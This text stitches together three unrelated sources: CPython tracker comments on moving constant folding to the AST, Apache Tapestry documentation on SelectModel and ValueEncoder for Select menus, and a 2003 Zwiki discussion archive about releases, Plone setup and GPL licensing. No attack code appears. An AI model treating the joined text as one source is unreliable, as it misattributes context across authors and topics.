Yes, doing optimizations on the AST in CPython is unlikely to give any sizable speed improvements in real-world programs. Python as a language is not suited for static optimization, and even if you manage to inline a function, there's still CPython's interpreter overhead and boxed types that dwarf the effect of the optimization.
The goal of this patch was never to significantly improve the speed. It was to replace the existing bytecode peephole pass with cleaner and simpler code, which also happens to produce slightly better results.
My motivation is to improve speed, reduce memory usage, and get quicker startup time for real-world applications. If some optimization in the FAT optimizer gives a significant speedup, I want to try it.
But this time, my motivation is that I felt "everyone thinks constant folding should move from the peephole pass to the AST; there is a patch about it, but unfortunately it was suspended (maybe because of a lack of reviewers)."
Reading #28813, I think there is consensus that constant folding should move to the AST.
INADA Naoki added the comment:
> My motivation is improve speed,
Ah, if the motivation is performance, I would like to see benchmark
results :-) I understand that an AST optimizer would help to produce
more efficient bytecode, right?
> reduce memory usage,
I noticed an issue with the peephole optimizer: the constant folding
step keeps original constants. Moving constant folding to the AST
stage fixes this issue by design.
> and quicker startup time for real world applications.
You mean faster import time on precompiled .pyc files, right? It's
related to the hypothetical faster bytecode.
> If some optimization in FAT optimizer has significant speedup, I want to try it.
See
FYI it took me something like 2 months to build the FAT Python "infrastructure": fix CPython bugs, design guards, design the AST optimizer, write unit tests, etc. I didn't spend much time on efficient optimizations. But my first rule was to not break the CPython test suite, and not break the Python semantics; otherwise it would be impossible to enable the optimizer by default in CPython, which is my long-term goal.
I've tried to update ast_opt.c[t] without changing the AST.
But I can't find a clear way to solve the "foo" + "bar" docstring problem.
This patch adds only docstring to AST.
Naoki: Can you please open a new issue for your ast-docstring.patch change? I like it, but this issue became too big, and I'm not sure that everyone in the nosy list is interested by this specific change.
I submit new issues:
* #29463 for AST change (change docstring from first statement to attribute).
* #29469 for constant folding
Note that this issue contains more peephole -> AST optimization changes.
But I want to start with these two patches to ease review and discussion.
I created the issue #29471: "AST: add an attribute to FunctionDef to distinguish functions from generators and coroutines". | https://bugs.python.org/issue11549 | CC-MAIN-2019-26 | en | refinedweb |
The documentation for the Select Component and the Tapestry Tutorial provide simplistic examples of populating a drop-down menu (as the (X)HTML Select element) using comma-delimited strings and enums. However, most real-world Tapestry applications need to populate such menus using values from a database, commonly in the form of java.util.List objects. Doing so generally requires a SelectModel and a ValueEncoder bound to the Select component with its "model" and "encoder" parameters:
<t:select t:id="colorMenu" value="selectedColor" model="ColorSelectModel" encoder="colorEncoder" />
In the above example, ColorSelectModel must be of type SelectModel, or anything that Tapestry knows how to coerce into a SelectModel, such as a List or a Map or a "value=label,value=label,..." delimited string, or anything Tapestry knows how to coerce into a List or Map, such as an Array or a comma-delimited String.
If you provide a property of type List for the "model" parameter, Tapestry automatically builds a SelectModel that uses each object's toString() for both the select option value and the select option label. For database-derived lists this is rarely useful, however, since after form submission you would still have to convert the submitted string back into an object. Although you could create your own SelectModel just for this purpose, you may as well let Tapestry do it for you, using SelectModelFactory.
To have Tapestry create a SelectModel for you, use the SelectModelFactory service. SelectModelFactory creates a SelectModel from a List of objects (of whatever type) and a label property name that you choose:
@Property
private SelectModel colorSelectModel;

@Inject
SelectModelFactory selectModelFactory;
...
void setupRender() {
    // invoke my service to find all colors, e.g. in the database
    List<Color> colors = colorService.findAll();

    // create a SelectModel from my list of colors
    colorSelectModel = selectModelFactory.create(colors, "name");
}
The resulting SelectModel has a selectable option (specifically, an OptionModel) for every object in the original List. The label property name (the "name" property, in this example) determines the user-visible text of each menu option, and your ValueEncoder's toClient() method provides the encoded value (most commonly a simple number). If you don't provide a ValueEncoder, the result of the objects' toString() method (Color#toString() in this example) is used. Although not a recommended practice, you could set your toString() to return the object's ID for this purpose:
...
@Override
public String toString() {
    return String.valueOf(this.getId());
}
But that is contorting the purpose of the toString() method, and if you go to that much trouble you're already halfway to the recommended practice: creating a ValueEncoder.
In addition to a SelectModel, your Select menu is likely to need a ValueEncoder. While a SelectModel is concerned only with how to construct a Select menu, a ValueEncoder is used when constructing the Select menu and when interpreting the encoded value that is submitted back to the server. A ValueEncoder is a converter between the type of objects you want to represent as options in the menu and the client-side encoded values that uniquely identify them, and vice versa. Most commonly, your ValueEncoder's toClient() method will return a unique ID (e.g. a database primary key, or perhaps a UUID) of the given object, and its toValue() method will return the object matching the given ID by doing a database lookup (ideally using a service or DAO method).
If you're using one of the ORM integration modules (Tapestry-Hibernate, Tapestry-JPA, or Tapestry-Cayenne), the ValueEncoder is automatically provided for each of your mapped entity classes. The Hibernate module's implementation is typical: the primary key field of the object (converted to a String) is used as the client-side value, and that same primary key is used to look up the selected object.
That's exactly what you should do in your own ValueEncoders too:
public class ColorEncoder implements ValueEncoder<Color>, ValueEncoderFactory<Color> {

    @Inject
    private ColorService colorService;

    @Override
    public String toClient(Color value) {
        // return the client-side value: the object's unique ID
        return String.valueOf(value.getId());
    }

    @Override
    public Color toValue(String clientValue) {
        // look up the object matching the given ID
        // (findById is illustrative; use your own service or DAO method)
        return colorService.findById(Long.parseLong(clientValue));
    }

    // let this ValueEncoder also serve as a ValueEncoderFactory
    @Override
    public ValueEncoder<Color> create(Class<Color> type) {
        return this;
    }
}
Alternatively, if you don't expect to need a particular ValueEncoder more than once in your app, you might want to just create it on demand, using an anonymous inner class, from the getter method in the component class where it is needed. For example:
. . .
public ValueEncoder<Color> getColorEncoder() {
    return new ValueEncoder<Color>() {

        @Override
        public String toClient(Color value) {
            return String.valueOf(value.getId());
        }

        @Override
        public Color toValue(String clientValue) {
            // findById is illustrative; use your own service or DAO method
            return colorService.findById(Long.parseLong(clientValue));
        }
    };
}
Notice that the body of this anonymous inner class is the same as the body of the ColorEncoder top level class, except that we don't need a create method.
If your ValueEncoder implements ValueEncoderFactory (as the ColorEncoder top level class does, above), you can associate your custom ValueEncoder with your entity class so that Tapestry will automatically use it every time a ValueEncoder is needed for items of that type (such as with the Select, RadioGroup, Grid, Hidden and AjaxFormLoop components). Just add lines like the following to your module class (usually AppModule.java):
    ...
    public static void contributeValueEncoderSource(
            MappedConfiguration<Class<Color>, ValueEncoderFactory<Color>> configuration) {
        configuration.addInstance(Color.class, ColorEncoder.class);
    }
If you are contributing more than one ValueEncoder, you'll have to use raw types, like this:
    ...
    public static void contributeValueEncoderSource(
            MappedConfiguration<Class, ValueEncoderFactory> configuration) {
        configuration.addInstance(Color.class, ColorEncoder.class);
        configuration.addInstance(SomeOtherType.class, SomeOtherTypeEncoder.class);
    }
The Select component's "encoder" parameter is optional, but if the "value" parameter is bound to a complex object (not a simple String, Integer, etc.) and you don't provide a ValueEncoder with the "encoder" parameter (and one isn't provided automatically by, for example, the Tapestry Hibernate integration), you'll receive a "Could not find a coercion" exception (when you submit the form) as Tapestry tries to convert the selected option's encoded value back to the object in your Select's "value" parameter. To fix this, you'll either have to 1) provide a ValueEncoder, 2) provide a Coercion, or 3) use a simple value (String, Integer, etc.) for your Select's "value" parameter, and then add logic in the corresponding onSuccess event listener method:
    <t:select t:id="colorMenu" value="selectedColorId" model="ColorSelectModel" />
    ...
    public void onSuccessFromMyForm() {
        // look up the color object from the ID selected
        selectedColor = colorService.findById(selectedColorId);
        ...
    }
But then again, you may as well create a ValueEncoder instead.
Actually, it's really pretty easy if you follow the examples above. But why is Tapestry designed to use SelectModels and ValueEncoders anyway? Well, in short, this design allows you to avoid storing (via @Persist, @SessionAttribute or @SessionState) the entire (potentially large) list of objects in the session, or rebuilding the whole list of objects again (though only one is needed) when the form is submitted. The chief benefits are reduced memory use and more scalable clustering, due to having far less HTTP session data to replicate across the nodes of a cluster.
Archived GeneralDiscussion.
catalog hiccup --Simon Michael, Mon, 01 Sep 2003 10:12:20 -0700 reply
Should be fixed now.
0.22rc4 released --simon, Mon, 01 Sep 2003 10:33:41 -0700 reply
With two fixes.. 0.22 will be deferred until at least tomorrow.
- experimental skin implementations: use "searchwiki" not "search" to avoid cmf/plone clash (IssueNo0593?)
- tracker: use Title not title_or_id in IssueTracker, FilterIssues
happy labour day --simon, Mon, 01 Sep 2003 10:56:57 -0700 reply
It's labour day here in the US.. happy labour day.
Something cool and non zwiki-related I want to share with you. Here in Santa Monica, the ocean has been very brown the last couple of days. A friend told me it's a "red tide", where plankton (algae ?) are blooming heavily. And they're bio-luminescent! So I went down there last night after sunset to see. Sure enough, as it got dark the surf began to glow with an electric light. Superb! It only glowed when the waves first broke, though - then it was covered up by murky foam. Splashing about in the shallows had no effect. Rats. The water felt inviting, so I swam out to where it was glowing. Swimming along, my fingers trailed light like comets, and all around me the water lit up. Magic! A couple of shooting stars zapped away - little fish! If you're in the neighbourhood, try it!
... -- Tue, 02 Sep 2003 02:22:11 ?
Thanks, Volker
zwiki.org error --FlorianKonnertz, Tue, 02 Sep 2003 08:50:39 -0700 reply
Just got an error when renaming a page:
* Module ZPublisher.Publish, line 150, in publish_module
* Module Products.Localizer, line 58, in new_publish
* ...ZWikiPage, line 1595, in rename

AttributeError
installing default pages in plone --Simon Michael, Tue, 02 Sep 2003 11:54:27 ?
Hi Volker, here is the easiest way to get the default zwiki pages in plone at the moment: use the ZMI to add a zwiki web outside of plone and cut and paste the pages from there into your plone folder.
This will also install the standard DTML-based pages RecentChanges?, SearchPage? and UserOptions?. But as of zwiki 0.22, these won't work in plone by default ("Evil Limi" has decreed "no DTML in plone wikis by default"). You can do one of two things here:
- re-enable DTML by default, by deleting the file ZWiki/zwiki_plone/no_dtml.dtml on the filesystem.
- use the experimental skin-based implementations included in 0.22, which don't require that your wiki be DTML-enabled. These aren't ready. But they work and you can customize their appearance, so.. to use them, just provide links to FrontPage/recentchanges and FrontPage/searchwiki (searches only the current wiki, unlike the plone search form). useroptions doesn't do anything in cmf/plone so ignore that one.
This is all in flux. I think we should add a /setupDefaultPages method to install these, and do away with the ZMI "add zwiki web" option. As usual, help is welcome, I'd like to work on this but don't know just how soon that will be.
Re: IssueTracker --Simon Michael, Tue, 02 Sep 2003 11:59:48 -0700 reply
"Woellert, Kirk D." <kirk.woellert@ngc.com> writes:
Thank you, Thank you, thank you! I renamed the no_dtml.dtml file as you suggested. I don't see the screen shot page anymore. I get this error. I used the auto setup script so my catalog should already be made, right?
Site error
This site encountered an error trying to fulfill your request. The errors were:

Error Details
Error Type: CatalogError?
Error Value: Unknown sort_on index
Hi Kirk - that setup script was not maintained and needs an update by the looks of things. I hope to incorporate it soon, but I don't know when that will be, funded work must take precedence right now. sort_on should be an argument it passes to the catalog, not an index. Sorry I can't be more help right now.
I tried posting to the discussion page again, but "add a comment" does not seem to work. The web browser just times out, and the page is rendered again just as it was before clicking the tab.
That's odd. Posting to GeneralDiscussion when it's large does take a long time (less than a minute.. ?). See if you can post on shorter pages.
zwiki.org error --SimonMichael, Tue, 02 Sep 2003 12:25:42 -0700 reply
Hi Florian. Can you reproduce it ? Can I ? If not, what page were you renaming ? Thanks
... -- Tue, 02 Sep 2003 13:15:53 -0700 reply
The RecentChanges? page shows dates running four days behind (August 29 instead of September 2)
0.22rc5 released --SimonMichael, Tue, 02 Sep 2003 13:21:07 -0700 reply
Bake 0.22 a little longer. Latest fixes:
- use Title instead of title_or_id in default backlinks templates
- use the now-preferred Title attribute in pageNames(), and include it in the page brains returned by pages()
zwiki.org error --FlorianKonnertz, Wed, 03 Sep 2003 04:14:12 -0700 reply
I tried to rename WikiAnwendungbeireiche? to WikiAnwendungbereiche?, which already exists - but i reproduced it by renaming to WikiAnwendungbereicheGruende?
zwiki.org error --FlorianKonnertz, Wed, 03 Sep 2003 04:16:19 -0700 reply
Err, WikiAnwendungbereiche? does not exist, this was wrong, sorry. But anyway... already an idea?
How to display a link to log in --Kurt Yoder, Wed, 03 Sep 2003 14:36:19 -0700 reply
Simon Michael said:
Ah, very good. Yes, all you need is to make a link to the login form appear, only when not logged in. Such a code snippet should be easy to find with a little searching. It's something along the lines of:

    <span tal:condition="...">
      <a href="login_form">log in</a> to edit this page
    </span>
You'll add this to your Zwiki skin, most likely, by customizing it. I don't know if you've found out how to customize skins yet. Eg if you're in CMF/Plone, go to portal_skins/zwiki_plone/wikipage_view and click customize..
Thanks for your help!
-- Kurt Yoder Sport & Health network administrator
RemoteWikiLinks --DeanGoodmanson, Wed, 03 Sep 2003 14:52:46 -0700 reply
Again noticed that the target has to be more than one character. ZWiki:Z vs. ZWiki:ZWiki Got bit by building a link to an indexed query, and MyExample:1 failed. For the time being MyExample:1/ works just fine. I'll need to dig more at the regex to understand it...a few minutes wasn't enough. Hmm..ISBN #1? BookLookup:1\ BookLookup:01
Aside from the general use of a WikiName as the target of the remote link, are there any other reasons why 1 character might be invalid?
removing last edited tooltip --DeanGoodmanson, Wed, 03 Sep 2003 14:58:21 -0700 reply
As I've put off upgrading long enough to merit a multi-hour upgrade, I'd like to quickly remove the "last edited ..." tool tips for a short-term speed increase stop-gap. I've found that a few RecentChanges? links on the main pages and backlinks on every page are helpful, but as Simon pointed out earlier, that causes each page to be awoken.

I skimmed through some recent RC code, along with my existing 0.17.0 site, for a spot to comment out that call, but none stuck out as an easy one- or two-point snip. Smelled like linktitle...

Is there a one or two position cut-point to remove the tool-tip feature from my older version?
zwiki.org error --Simon Michael, Wed, 03 Sep 2003 20:36:52 -0700 reply
Thanks, followed up on IssueNo0597?
new Search idea - canonicalLinks --BillSeitz, Fri, 05 Sep 2003 09:36:54 -0700 reply
Avoid having to index full text?
removing last edited tooltip --BillSeitz, Fri, 05 Sep 2003 09:39:49 -0700 reply
I just did this on my codebase yesterday (not rolled out yet). I found that if I just changed the default argument value in _renderLink() to render_title=0, it worked.
new Search idea - canonicalLinks --BillSeitz, Fri, 05 Sep 2003 09:45:46 -0700 reply
to clarify my overly-terse post:
- the "default" Catalog spec includes canonicalLinks, but not the full text
- canonicalLinks includes all WikiName-s in a body, even for pages that don't exist
- if you obsessively write in WikiName-s, then that catches a lot
From julien Motch sept 5
Subject : Can not edit Zwiki pages when logged in as manager
Hi, I have just installed Zwiki 0.21 with Zope 2.6.1. To test it, I created a Zwiki web without any problem. But when I click on the view link, no edit links appear at the bottom of the page although I am logged in as manager and can do everything a manager is able to do in the Zope system.
If I want to edit the wiki pages, I have to give edit capabilities to anonymous users. Nothing else is working.
Any idea about the origin of the problem?
... -- Sat, 06 Sep 2003 16:51:35 -0700 reply
Have you given "change page type" to anonymous users?
date formatting oddity --DeanGoodmanson, Mon, 08 Sep 2003 08:24:41 -0700 reply
The dates in the messages weren't formatted on my home XP Zope2.7.1 box as they are on Zwiki. Examples at DeanG. Any thoughts?
I wanted to test it through the Zope python prompt, but I haven't done that much as couldn't find the "ZopeTime?" method. >:-/ (Gentoo should be in the mail this week! :-))
... -- Tue, 09 Sep 2003 05:08:07 -0700 reply
To improve Zwiki, drop the GPL -- Tue, 09 Sep 2003 05:24:43 -0700 reply
After a few edits, my message was getting big, so instead of clogging up this page, I moved it to:
Please take a look. I am raising money to fund continuous development of a public domain Zope wiki product, but was hoping not to have to start from scratch. The above linked document explains my reasoning and my passion to make this happen. I also address the below concerns. I may be crazy, but I REALLY believe in the potential of this software.
Way to go, Simon! I can't wait to talk to you. I'll try to contact you tomorrow night after I get back to San Diego. Meanwhile, I am n_johnson@yahoo.com but my company firewall won't let me access mail.yahoo.com so I'll get email tomorrow.
Nate
To improve Zwiki, keep the GPL --TonyRossini, Tue, 09 Sep 2003 07:33:13 -0700 reply
I hope that the zwiki community would consider keeping the GPL. There is no particular reason that changing licenses would speed up the development process; I do not see a mass of developers looking at jumping in and helping just because the license changes, nor any reason for those folks to give back. As one who is working on putting together $$ for Simon for consulting (working through university purchasing/contract systems is taking MUCH (months) longer than I thought; no, Simon, I've not changed my mind, just haven't had time to plow through the bureaucracy), I'd hope that it remains GPL. Or at least LGPL.
To improve Zwiki, keep the GPL --DeanGoodmanson, Tue, 09 Sep 2003 08:41:16 -0700 reply
More information for the topic...
TWiki is GPL (TWiki:GnuGeneralPublicLicense). I thought the WikiWiki was too, but I can't seem to find that. Plone is GPL.
quick update --Simon Michael, Tue, 09 Sep 2003 13:02:09 -0700 reply
Good day all.. 0.22 is bogged down with CVS confusion right now. I lost track of things I wanted to merge from the trunk and things I didn't, exacerbated by pcl-cvs and cvs weirdness. I can see it's time for a cleanup of my CVS & release process. I have been spread a bit thin and so am just taking this a step at a time. Will respond to questions here when I can. Veterans, thanks for stepping in. The recent bug reports have been excellent also, raising the quality of the 0.22 release.
Also feeling as if I may have dissed the community's work in the recent thread with Laura. If it came across that way, sorry. I tried to break through the veneer of politeness and stimulate clear discussion. Also I sometimes veer into soapbox mode and should make that clearer. If anyone's "at fault" for the state of zwiki docs, it's me. I've often felt unable to push this project forward as fast as I'd like. O well! Press on!
mail client change, mail list --Simon Michael, Tue, 09 Sep 2003 13:25:45 -0700 reply
In other news.. after a run of many years with emacs gnus, I've switched to one of these new-fangled GUI mail clients (the excellent Thunderbird). Big news for me :). All part of the quest for efficient reliable messaging.
I don't yet have the same feeling of fluidity/usability from the zwiki mail list/zwiki.org's wikimail that I do with other lists/newsgroups. I'm not sure why that is, any ideas ?
The recent threading fix should help, and now that my mail client is faster, as an experiment I'm going to try following discussion strictly by mail for a bit.
mail client change, mail list --Dean Goodmanson, Tue, 09 Sep 2003 13:37:04 -0700 reply
- Do you see who the individual emails are coming from? They don't show up in Outlook 2000.
- I rarely respond in email; this post is an experiment. Sometimes I'd like the "forwarded from" link to include the usability name #bottom to get me to the comment, but, BUT.. lately I then scroll to the latest post to be sure to use the reply. THUS.. I would prefer the forwarded from to include a message anchor (which doesn't exist, but may add an "end" delimiter to the messages?).
--
forwarded from
change management thought --BillSeitz, Tue, 09 Sep 2003 14:07:22 -0700 reply
How about: every change has a related specific page (Issue or not), and thus every item in the ReleaseNotes points to the appropriate page.
The meta-principle involved: "control" changes by putting them through pre-documentation.
Is this an obnoxious idea?
cached BackLinks - custom tweak --BillSeitz, Tue, 09 Sep 2003 18:13:28 -0700 reply
see and give me some feedback.
0.22.0rc6 released --Simon Michael, Tue, 09 Sep 2003 20:09:38 -0700 reply
If all goes well 0.22 will follow late tomorrow. The ChangeLog? in the trunk and on this site is now generated with cvs2cl.
- support the STX :img: syntax, finally. (IssueNo0601?, etc.)
- subscribe() and unsubscribe() now redirect as they used to, ie back to the subscribe form, when there is no redirectURL argument (IssueNo0584?)
- the standard_page_type property for forcing new page types is no longer supported; use allowed_page_types instead.
- when unspecified, the type of new pages now defaults to the first of the wiki's allowed page types.
- make catalog() provide catalog with correct acquisition wrapper (IssueNo0597?)
- new catalogId() method returns the id of the catalog in use, or None. Requires the "Manage properties" permission.
- getPath() is now supported
- ChangeLog? is no longer provided in releases for the moment, to simplify maintenance
0.22.0rc6 released -- Tue, 09 Sep 2003 21:46:14 -0700 reply
Had trouble finding the download. In the past I relied on the FrontPage links and your Zope page. Through OldFrontPage? figured out , so added the link to ReleaseNotes. Didn't in other places as I was looking for the pre-releases.
0.22.0rc6 released --Simon Michael, Tue, 09 Sep 2003 22:23:57 -0700 reply
You didn't see "NavigationAids has more links to downloads, documentation, etc" on FrontPage ?
I too miss the download link on FrontPage. Not sure how to put it there without duplication of effort and/or too much clutter.
0.22.0rc6 released -- Wed, 10 Sep 2003 00:01:20 -0700 reply
NavigationAids.. ahhARG! :-) Once again, I overlooked the obvious. Search hits on "download" were too many, rc6 nada, and "tarball" close but no link.
(If it's any consolation, I couldn't find the license or download of WikiWiki after 5 minutes of searching and hitting login dialogs..)
0.22rc7 released --Simon Michael, Wed, 10 Sep 2003 14:36:56 -0700 reply
An inconsistency that need not see the light of day after all.
- backlinksFor() now always returns brain-like objects, like pages(). (IssueNo0604?, Magog)
Also, include page_url and linkTitle in PageBrains? to increase backwards compatibility with legacy backlinks templates. Old backlinks templates should now be fully supported except in this case: when there is a catalog with meta_type, path, and canonicalLinks indexes but without page_url and linkTitle metadata (unlikely).
Default page type -- Wed, 10 Sep 2003 20:36:28 -0700 reply
The current behaviour seems to be to create new pages with the same type (selected by default in the type box) as the page they are created from. Of course the user can override this by then selecting another type. Is there any mechanism to force a wiki web to always have one particular type set as the default when a new page is created? allowed_page_types does not seem to have any effect here; it just controls which types are shown in the selection box.
Zwiki 0.22 released --Simon Michael, Wed, 10 Sep 2003 23:54:07 -0700 reply
Summary: Memory efficiency/performance/scalability improvements; simpler page types and DTML control; zwiki_plone and default skin updates; wikimail tweaks; STX images; bugs, fixes, features.
Quite a lot going on! Good luck. See and for download and details. I hope to sort out my zope.org publishing process soon.
I'm happy to announce that zope.org and plone.org are now using mainstream Zwiki. This is a big milestone. There have been a number of installation issues with the zope.org wikis but these are being addressed (thanks webmasters).
Also I think Zwiki may be coming up on its 5th birthday around now..
Default page type --Simon Michael, Thu, 11 Sep 2003 00:34:09 ?
change management thought --Simon Michael, Thu, 11 Sep 2003 00:37:41 -0700 reply
BillSeitz wrote:
How about: every change has a related specific page (Issue or not), and thus every item in the ReleaseNotes points to the appropriate page.
That would be interesting, something like CVSTrac? perhaps. I'm most concerned with lightening my process right now though.
cached BackLinks - custom tweak --Simon Michael, Thu, 11 Sep 2003 00:39:26 -0700 reply
BillSeitz wrote:
see and
Hi Bill, I had a quick look - is it inline backlinks ? Those can work. Your backlinks form shouldn't be slow, perhaps 0.22 will help.
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 00:50:51 -0700 reply
Dean Goodmanson wrote:
1. Do you see who the individual emails are coming from? They don't show up in Outlook 2000.
Thunderbird showed that message as from Dean Goodmanson <zwiki-wiki@zwiki.org>. If Outlook has learned a fixed or blank real name for that zwiki-wiki@zwiki.org address, that might explain it.
Also that message didn't get threaded in my mail client. Did you reply to some old message (looks like 2003/09/01 ?) That would explain that.
> the latest post to be sure to use the reply. THUS.. I would prefer the
> forwarded from to include a message anchor. (which doesn't exist,
Eh ? Do you mean like the timestamp link
or the reply link
? I'd like to use those but it felt like just too much visual clutter.
To improve Zwiki, keep the GPL --Simon Michael, Thu, 11 Sep 2003 02:11:26 -0700 reply
> reason for those folks to give back. As one who is working on putting
> together $$ for Simon for consulting (working through university
> purchasing/contract systems is taking MUCH (months) longer than I
Hey thanks.. I hope it works out.
So far, the longer I'm in this business, the more I value the GPL. Squeak's licensing quagmire and the recent assault on GNU/Linux are two of the latest inputs.
I do have a problem which I've being thinking about quite a bit. Since the topic has come up I'll just put my current thinking out there..
I would like maximum sharing and reuse of Zwiki code in the Zope 3 project. I'd like Zwiki for zope 3 to be in the zope 3 cvs repository and I'd like all Zwiki code to be freely reusable in zope-3-zwiki and any other parts of Zope 3. But for now and the foreseeable future the zope 3 cvs repository, and the zope 3 project generally, accepts only ZPL code.
I'm the Zwiki copyright holder, so technically the license can be changed to whatever. Though past and potential future developers may have their own feelings about a license change. Some come because we are GPL, and vice versa.
GPL gives maximum protection against the unlikely-but-always-possible legal shenanigans that can be pulled if it ever becomes in anyone's interest to do so. I'm almost, but not quite convinced it's sensible to give this up.
I've thought of ZPLing? the whole thing. The ZPL seems to be both a license and a copyright transfer to "Zope corp. and contributors". I think the copyright assignment is required. So this would be a one-way deal, zwiki code developed in the zope 3 project would stay ZPL forever (unless Zope corp. and contributors agreed on a change.). Because of this I am not being hasty.
Dual licensing GPL/ZPL is possible, but I've heard there's not much point in that - it's essentially the same as abandoning the GPL. Though I'm not sure I completely agree with that.
Another option is to stay "almost GPL" - GPL with an exception for the zope 3 project. "This code is under GPL, except you may reuse any parts of it which are useful for the zope 3 project under the ZPL; the original Zwiki for zope 2 collected work remains under GPL and (c) SM". A tad murky but I think it could work fine. Technically someone could grab the entire codebase and use it under ZPL right away, but there would be at least a little extra social cost in doing this. Zwiki for zope 2 keeps at least some flavour of being a GPL project. In some ways this is the simplest thing that could possibly work, as in "most incremental and least disruptive option".
And of course just sticking with the GPL is an option. Those zope 3 guys can write anything they need pretty quick with or without Zwiki - in fact Zwiki for zope 3 may be more of a rewrite than a port - but there would be at least some wasteful duplication of effort. And since they're unlikely to come and play in the GPL world soon, I probably wouldn't get to play with them so much.
That's where I'm at. Moving to a "weaker" license is a one way move, so as I said I'm mulling it over in a leisurely way.
To improve Zwiki, keep the GPL --Simon Michael, Thu, 11 Sep 2003 02:16:56 -0700 reply
TonyRossini wrote:
> is no particular reason that changing licenses would speed up the
> development process; I do not see a mass of developers looking at jumping
> in and helping just because the license changes, nor any reason for those
> folks to give back. As one who is working on putting
Actually I think choice of license is an important factor in attracting developers' time and attention.
Default page type -- Thu, 11 Sep 2003 06:24:40 ?
I want to strongly encourage it by setting it as the default, but I do still want to show the other page types, otherwise people will never even know about them, and sometimes they are useful. The problem is, this makes sense for a lot of wikis. For example, I want to encourage pages to be done using reStructuredText. But anybody who creates a page off of FrontPage will get a new page which by default is set to StructuredText (assuming it is the default FrontPage). Personally, I think one way it could work is that the default page type could be the first item in allowed_page_types, and maybe you could have an option to also work in the current style (default page type is the same as the page you are creating off of).
-Colin
mail client change, mail list --DeanGoodmanson, Thu, 11 Sep 2003 07:20:56 -0700 reply
Eh ? Do you mean like the timestamp link
Yes. :-) I overlooked that. I agree that it is a long URL, but it does ID the source of the message, which may justify including it in the mail-out.
Thunderbird showed that message as from Dean Goodmanson .
An example of the mail headers' From lines; the Zwiki one doesn't include the sender's name in Outlook, where the Yahoo one does:

Zwiki mail: From: zwiki-wiki@zwiki.org (Simon Michael)
Yahoo mail: From: Dean Goodmanson <goodmansond@yahoo.com>
Note: When getting messages from Zwiki in my yahoo account, the From name shows up! :-)
This issue may be another case of using a non-standard format to accommodate the majority. :-/
Default page type --Simon Michael, Thu, 11 Sep 2003 11:07:39 -0700 reply
Oh, by the way (time machine whirrs) I agree and dropped this - in 0.22 create() reads:
    # set the specified page type, otherwise use this wiki's default
    p.page_type = type or self.defaultPageType()
ie we no longer inherit type from the parent. I don't think that behaviour is necessary.
> think one way it could work is that the default page type could be the
> first item on allowed_page_types, and maybe you could have ano option
Good idea.. (whirr) defaultPageType() is the first of the allowedPageTypes().
ALL_PAGE_TYPES is another useful attribute. With these three it should be possible to show whatever you want in the edit form. Maybe a list of radio buttons with the disallowed ones disabled ?
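That radio-button idea can be sketched like this, assuming the three attributes behave as described above (defaultPageType() returning the first of allowedPageTypes(), ALL_PAGE_TYPES listing every type); the page object and the option-dict shape here are hypothetical, not Zwiki's actual API:

```python
# Hypothetical sketch of the radio-button list suggested above.
# allowedPageTypes / defaultPageType / ALL_PAGE_TYPES are the attribute
# names mentioned in this thread; the returned dict shape is made up.
def pageTypeOptions(page):
    allowed = page.allowedPageTypes()
    default = page.defaultPageType()  # first of the allowed types
    return [{'type': t,
             'checked': t == default,       # preselect the wiki default
             'disabled': t not in allowed}  # show but disable the rest
            for t in page.ALL_PAGE_TYPES]
```

An edit form template could then render one radio input per dict, honouring checked and disabled.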
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 12:03:30 -0700 reply
ONE. As you probably know, when you post via the web the from address will be zwiki-wiki@zwiki.org and the real name will be your (cookie or authenticated) username. Ie normally something like:
From: zwiki-wiki@zwiki.org (DeanGoodmanson)
Your last message () was like this. In this case your mail client should show at least "DeanGoodmanson". But because it has seen zwiki-wiki@zwiki.org before with other real names attached, it might not. Without knowing Outlook I can't say more.
TWO. When you post via mail - assuming the wiki uses the mail_replyto property as we do, and not mail_from - your real from should come through, eg:
From: Dean Goodmanson <your@real.address>
Your previous message () should have been like this, but actually it came through as:
From: Dean Goodmanson <zwiki-wiki@zwiki.org>
(You can examine these messages in the gmane newsgroup if needed.) That's odd. Dumb questions:
- I assume your Outlook is not sending out mail with that from address ?
- To generate this message, did you reply to something, or did you compose a new message ? I think the latter, since I see zwiki.org's auto-in-reply-to kicking in, threading it under 20030901103341-0700@zwiki.org, the first GeneralDiscussion post of the month.
- Did you send to zwiki@zwiki.org (recommended for wiki subscribers) or zwiki-wiki@zwiki.org (necessary for page subscribers) ?
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 12:06:54 -0700 reply
PS, what I wrote above may not apply exactly for page subscribers. It's how things appeared to a wiki (mailing list) subscriber. Tricky isn't it.
RemoteWikiLinks --Simon Michael, Thu, 11 Sep 2003 16:00:23 -0700 reply
Aside from that the general use is a WikiName as the target from the remote link, is there any other reasons why 1 character might be invalid?
It's not intentional. but a consequence of the way we require the interwikilink regexp to end on an alphanumeric character (for some forgotten bug report):
    interwikilink = r'!?((?P<local>%s):(?P<remote>%s))' \
                    % (localwikilink, urlchars+urlendchar)
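To see why a one-character target can't match, here is a runnable reconstruction using simplified stand-ins for localwikilink and urlchars (the real Zwiki definitions are longer): since urlchars requires at least one character and urlendchar one more, the remote part needs a minimum of two characters.

```python
import re

# Simplified stand-ins for the real Zwiki patterns (illustration only)
localwikilink = r'[A-Z][a-z]+[A-Z][a-zA-Z]*'     # crude WikiName
urlchars      = r'[A-Za-z0-9/:@_%~#=&.\-?+$,]+'  # one or more url characters
urlendchar    = r'[A-Za-z0-9/]'                  # must end alphanumeric or /

interwikilink = r'!?((?P<local>%s):(?P<remote>%s))' \
                % (localwikilink, urlchars + urlendchar)

# the remote part needs urlchars (>=1 char) plus urlendchar (1 char),
# so a single-character target like MyExample:1 can never match
print(bool(re.match(interwikilink, 'MyExample:1')))   # False
print(bool(re.match(interwikilink, 'MyExample:1/')))  # True
```

This reproduces the behaviour reported above: MyExample:1 fails while MyExample:1/ works.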
How to display a link to log in --Simon Michael, Thu, 11 Sep 2003 16:14:25 -0700 reply
Kurt Yoder wrote:
Hi Kurt.. yes I did assume you were already using CMF..
... --Simon Michael, Thu, 11 Sep 2003 16:25:38 -0700 reply
The RecentChanges? page shows dates running four days behind (August 29 instead of September 2)
I didn't see this.. I haven't messed with the catalog lately and I'm assuming it's resolved now.
mail tip, threading --Simon Michael, Thu, 11 Sep 2003 18:40:52 -0700 reply
A newsreader with fast message searching (Thunderbird) plus the gmane news server works really well for finding and reading old messages in context, from zwiki.org, the zope lists, or whatever. You may need to unsubscribe and resubscribe the group to download all the message headers.
